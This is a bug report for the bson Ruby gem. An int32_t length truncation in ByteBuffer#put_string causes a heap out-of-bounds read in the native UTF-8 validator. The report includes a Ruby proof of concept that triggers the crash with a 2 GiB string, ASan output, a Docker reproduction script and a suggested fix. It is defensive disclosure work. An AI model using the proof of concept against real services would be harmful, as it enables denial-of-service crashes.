Type: Bug
Resolution: Fixed
Priority: Unknown
Affects Version/s: None
Component/s: BSON
Fully Compatible
Ruby Drivers
Not Needed
Summary
BSON::ByteBuffer#put_string truncates Ruby string lengths to int32_t before UTF-8 validation. A string of 2**31 bytes wraps to a negative length. That value is then converted to a huge size_t, which drives the native UTF-8 validator past the end of the heap allocation.
Affected version
- Software: bson gem
- Version: 5.2.0
- Commit: dcae7f483a262305159ae8b2711cf359f7d9af65
Details
The native string encoder stores the result of RSTRING_LEN in an int32_t variable, even though Ruby strings can be longer than INT32_MAX bytes.
ext/bson/write.c:209
static VALUE pvt_bson_encode_to_utf8(VALUE string) {
  VALUE existing_encoding_name;
  VALUE encoding;
  VALUE utf8_string;
  const char *str;
  int32_t length;
  ...
  str = RSTRING_PTR(utf8_string);
  length = RSTRING_LEN(utf8_string);
  rb_bson_utf8_validate(str, length, true, "String");
RSTRING_LEN returns long, which is 64 bits on LP64 platforms such as 64-bit Linux and macOS. Assigning it to int32_t silently truncates the length of any string of 2**31 bytes (2 GiB) or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:
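The two implicit conversions can be reproduced in isolation with the small C sketch below. The helper names stored_length and validator_length are hypothetical and are not part of bson-ruby. int64_t stands in for RSTRING_LEN's long on an LP64 host. The long-to-int32_t step is implementation-defined in C; this sketch assumes the wrap-around behaviour that GCC and Clang document.

```c
#include <stddef.h>
#include <stdint.h>

/* Mimics `int32_t length = RSTRING_LEN(...)`: keeps only the low 32 bits
 * (implementation-defined; GCC and Clang wrap modulo 2**32). */
static int32_t stored_length(int64_t rstring_len)
{
    return (int32_t)rstring_len;
}

/* Mimics passing that int32_t as rb_bson_utf8_validate's size_t utf8_len.
 * Signed-to-unsigned conversion is well-defined: the value is reduced
 * modulo SIZE_MAX + 1, so a negative length becomes a huge bound. */
static size_t validator_length(int32_t length)
{
    return (size_t)length;
}
```

With these helpers, stored_length(2147483648) yields INT32_MIN, and validator_length(INT32_MIN) yields SIZE_MAX - INT32_MAX. By the same arithmetic, lengths of 2**32 bytes and above wrap back to small non-negative values. For example, 2**32 + 5 becomes 5, which would presumably cause only a prefix of the string to be validated. The sketch shows the arithmetic only and was not checked against the extension.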
ext/bson/libbson-utf8.c:105
void rb_bson_utf8_validate (const char *utf8, size_t utf8_len, bool allow_null, const char *data_type) {
  ...
  for (i = 0; i < utf8_len; i += seq_length) {
    _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);
Converting a negative int32_t to size_t wraps it to a value near UINT64_MAX. The loop bound is therefore far larger than the buffer, and the loop keeps reading past the end of the string. The first out-of-bounds read happens at the dereference in _bson_utf8_get_sequence:
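The worked value below assumes a 64-bit size_t. Converting INT32_MIN reduces it modulo 2^64, which gives the loop bound. The ASan report then shows an allocation of only 2^31 + 1 bytes (the string plus Ruby's trailing NUL):

```latex
(\texttt{size\_t})(-2^{31}) = 2^{64} - 2^{31} = 18446744071562067968 = \texttt{0xFFFFFFFF80000000}
\gg 2^{31} + 1 = 2147483649
```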
ext/bson/libbson-utf8.c:40
unsigned char c = *(const unsigned char *) utf8;
Proof of concept
require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)
AddressSanitizer output
==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
READ of size 1 at 0xffff75bfe801 thread T0
#0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
#1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
#2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
#3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243
0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40 in _bson_utf8_get_sequence
Reproduction
On a machine with Docker, run:
mkdir -p dfvuln-772-bson-put-string-oob
cd dfvuln-772-bson-put-string-oob

cat > poc_put_string_oob.rb <<'RUBY'
require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)
RUBY

docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc '
set -eux
apt-get update -qq
apt-get install -y -qq git build-essential pkg-config >/dev/null
git clone --depth=1 https://github.com/mongodb/bson-ruby.git src
cd src
git rev-parse HEAD | tee /work/commit.txt
bundle config set path vendor/bundle
bundle install
cd ext/bson
make distclean >/dev/null 2>&1 || true
ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \
  --with-ldflags="-fsanitize=address"
make -j"$(nproc)"
cd ../..
cp ext/bson/bson_native.so lib/
ASAN_LIB=$(gcc -print-file-name=libasan.so)
set +e
LD_PRELOAD="$ASAN_LIB" \
  ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \
  ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log
status=${PIPESTATUS[0]}
set -e
test "$status" -ne 0
grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log
'
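This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log. Because the script clones the tip of the default branch (--depth=1), the commit that was actually built is recorded in commit.txt.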
Independent confirmation
The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.
ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: line 214 (inside pvt_bson_encode_to_utf8) and line 241 (inside rb_bson_byte_buffer_put_string). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent: there is no runtime check, and the compiler emits no warning at default warning levels (GCC's -Wconversion, which would flag it, is not enabled by -Wall or -Wextra). Passing the resulting negative value to rb_bson_utf8_validate, which takes size_t, directly causes the out-of-bounds read described above.
Severity assessment
Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.
Suggested fix
In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long, matching RSTRING_LEN's return type. Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix. The BSON string length prefix is an int32 that counts the string bytes plus the trailing NUL, so any string longer than INT32_MAX - 1 bytes cannot be encoded as valid BSON regardless:

long length = RSTRING_LEN(utf8_string);
/* The length prefix is length + 1 (trailing NUL) and must fit in int32. */
if (length > (long)INT32_MAX - 1) {
  rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length);
}
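The check can also be factored into a helper that computes the length prefix without any truncation. The sketch below assumes a hypothetical name, bson_string_length_prefix, which is not part of bson-ruby. It takes the long returned by RSTRING_LEN and refuses, rather than wraps, any length whose prefix (bytes + 1) would not fit in int32_t. On failure, the caller would raise as in the snippet above. On success, the same value can be used for the validator call and for the 4-byte prefix.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: compute the BSON string length prefix
 * (byte count + 1 for the trailing NUL) from a Ruby string length.
 * Returns false instead of truncating when the prefix cannot fit. */
static bool bson_string_length_prefix(long byte_len, int32_t *prefix_out)
{
    /* RSTRING_LEN never returns a negative value, but reject it defensively. */
    if (byte_len < 0) {
        return false;
    }
    /* byte_len + 1 <= INT32_MAX  <=>  byte_len <= INT32_MAX - 1 */
    if (byte_len > (long)INT32_MAX - 1) {
        return false;
    }
    *prefix_out = (int32_t)(byte_len + 1);
    return true;
}
```

Returning a bool keeps the helper free of Ruby API calls, so it can be unit-tested in plain C. The decision to raise (and which exception class to use) then stays at the call sites in write.c.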